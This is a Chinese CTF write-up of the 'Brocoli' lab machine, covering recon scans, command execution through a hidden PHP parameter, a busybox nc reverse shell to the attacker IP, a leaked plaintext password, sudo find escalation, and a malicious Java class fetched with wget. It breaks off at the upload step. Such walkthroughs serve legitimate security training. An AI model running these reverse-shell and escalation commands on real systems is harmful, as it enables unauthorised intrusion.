Brocoli

image

靶机地址:https://labs.thehackerslabs.com/machine/163

信息搜集

主机发现

1
2
3
4
5
6
7
8
9
root@LAPTOP-O235O5EH [~] ➜  arp-scan -l                                                                      [18:30:46]
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.100.31
Starting arp-scan 1.10.0 with 512 hosts (https://github.com/royhills/arp-scan)
......
192.168.100.22  08:00:27:06:e0:1d       PCS Systemtechnik GmbH
......

44 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 512 hosts scanned in 2.879 seconds (177.84 hosts/sec). 40 responded

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.22                                                       [18:31:23]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.22:22
Open 192.168.100.22:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 18:32 CST
Initiating ARP Ping Scan at 18:32
Scanning 192.168.100.22 [1 port]
Completed ARP Ping Scan at 18:32, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:32
Completed Parallel DNS resolution of 1 host. at 18:32, 6.51s elapsed
DNS resolution of 1 IPs took 6.52s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 18:32
Scanning 192.168.100.22 [2 ports]
Discovered open port 22/tcp on 192.168.100.22
Discovered open port 80/tcp on 192.168.100.22
Completed SYN Stealth Scan at 18:32, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.22
Host is up, received arp-response (0.00050s latency).
Scanned at 2026-01-22 18:32:38 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:06:E0:1D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.66 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

80/tcp目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://192.168.100.22                                               [18:32:38]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.100.22/_26-01-22_18-32-52.txt

Target: http://192.168.100.22/

[18:32:52] Starting:
[18:32:53] 403 -  279B  - /.ht_wsr.txt
[18:32:53] 403 -  279B  - /.htaccess.bak1
[18:32:53] 403 -  279B  - /.htaccess.sample
[18:32:53] 403 -  279B  - /.htaccess.save
[18:32:53] 403 -  279B  - /.htaccess_extra
[18:32:53] 403 -  279B  - /.htaccess_sc
[18:32:53] 403 -  279B  - /.htaccessBAK
[18:32:53] 403 -  279B  - /.htaccess_orig
[18:32:53] 403 -  279B  - /.htaccessOLD
[18:32:53] 403 -  279B  - /.htaccessOLD2
[18:32:53] 403 -  279B  - /.htm
[18:32:53] 403 -  279B  - /.html
[18:32:53] 403 -  279B  - /.htpasswd_test
[18:32:53] 403 -  279B  - /.htpasswds
[18:32:53] 403 -  279B  - /.httr-oauth
[18:32:53] 403 -  279B  - /.php
[18:32:54] 403 -  279B  - /.htaccess.orig
[18:33:03] 403 -  279B  - /server-status
[18:33:03] 403 -  279B  - /server-status/
[18:33:05] 301 -  318B  - /uploads  ->  http://192.168.100.22/uploads/
[18:33:05] 200 -  493B  - /uploads/

/uploads/brocoli.php显示500

说明肯定是有东西的。fuzz一下

1
wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt -u http://192.168.100.22/uploads/brocoli.php\?FUZZ\=id --hc 404,500

image

cmd传参

www shell

既然可以执行命令,那么直接反弹shell

1
busybox nc 192.168.100.31 7777 -e /bin/bash

image

提权

www -> brocoli

在/opt目录下泄露了brocoli用户的凭证

1
2
3
4
5
6
7
8
www-data@TheHackersLabs-Brocoli:/opt$ cat credenciales.txt

--------------------------------------------------------------------------
Credenciales:
--------------------------------------------------------------------------
[+] Usuario: brocoli
[+] Contraseña: megustalafruta
--------------------------------------------------------------------------

brocoli:megustalafruta

brocoli -> brocolon

1
2
3
4
5
6
7
brocoli@TheHackersLabs-Brocoli:/tmp$ sudo -l
Matching Defaults entries for brocoli on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User brocoli may run the following commands on TheHackersLabs-Brocoli:
    (brocolon) NOPASSWD: /usr/bin/find

用户brocolon存在sudo提权gtfobins有现成方案

https://gtfobins.org/gtfobins/find/

1
2
3
4
5
6
7
8
brocoli@TheHackersLabs-Brocoli:~$ sudo -u brocolon /usr/bin/find . -exec /bin/bash \; -quit
/usr/bin/find: ‘.’: Permission denied
/usr/bin/find: Failed to restore initial working directory: /home/brocoli: Permission denied
brocoli@TheHackersLabs-Brocoli:~$ cd /tmp/
brocoli@TheHackersLabs-Brocoli:/tmp$ sudo -u brocolon /usr/bin/find . -exec /bin/bash \; -quit
brocolon@TheHackersLabs-Brocoli:/tmp$ whoami
brocolon
brocolon@TheHackersLabs-Brocoli:/tmp$

brocolon -> root

1
2
3
4
5
6
7
brocolon@TheHackersLabs-Brocoli:/tmp$ sudo -l
Matching Defaults entries for brocolon on TheHackersLabs-Brocoli:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User brocolon may run the following commands on TheHackersLabs-Brocoli:
    (ALL : ALL) NOPASSWD: /usr/bin/java

sudo的java提权同样gtfobins有现成方案

https://gtfobins.org/gtfobins/java/

首先在kali上生成恶意java文件

1
2
3
4
5
6
7
8
9
cat >Shell.java <<EOF
public class Shell {
    public static void main(String[] args) throws Exception {
        new ProcessBuilder("/bin/sh").inheritIO().start().waitFor();
    }
}
EOF

javac Shell.java

上传到靶机上

1
busybox wget http://192.168.100.31:8000/Shell.java

image